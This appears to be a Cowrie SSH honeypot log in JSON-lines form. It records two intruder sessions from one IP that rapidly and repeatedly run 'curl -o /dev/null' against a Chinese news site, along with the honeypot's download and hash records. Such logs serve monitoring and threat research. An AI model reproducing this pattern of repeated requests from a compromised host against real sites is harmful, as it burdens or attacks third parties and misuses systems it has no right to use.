{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.596222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.597374Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.624133Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.625300Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.633438Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.634685Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.659249Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.660518Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.671432Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.672581Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.700230Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.701775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.710917Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.716872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.718082Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.747793Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.748997Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.761524Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.762865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.787568Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.798503Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.799783Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.805463Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.811519Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.812679Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.822238Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.837168Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.838552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.851345Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.852462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.873199Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.878378Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.879650Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.898462Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.899606Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.913125Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.920259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.921467Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.938762Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.940166Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.941694Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.957010Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.962597Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.963861Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.978456Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:19.986865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:19.987974Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.007379Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.008669Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.027412Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.028561Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.044722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.045923Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.071031Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.072420Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.090522Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.091715Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.118392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.119713Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.133800Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.135159Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.164678Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.166075Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.180359Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.181801Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.201626Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.205655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.206864Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.223841Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.225236Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.226607Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.246739Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.247932Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.261707Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.264028Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.265168Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.288876Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.290066Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.305866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.307161Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.329326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.330582Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.343782Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.345057Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.370224Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.371466Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.377511Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.379656Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.383315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.384346Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.395489Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.418245Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.419678Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.428549Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.429717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.463223Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.464667Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.470116Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.471427Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.509150Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.510389Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.515903Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.516946Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.553109Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.554360Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:20.556996Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:20.559259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
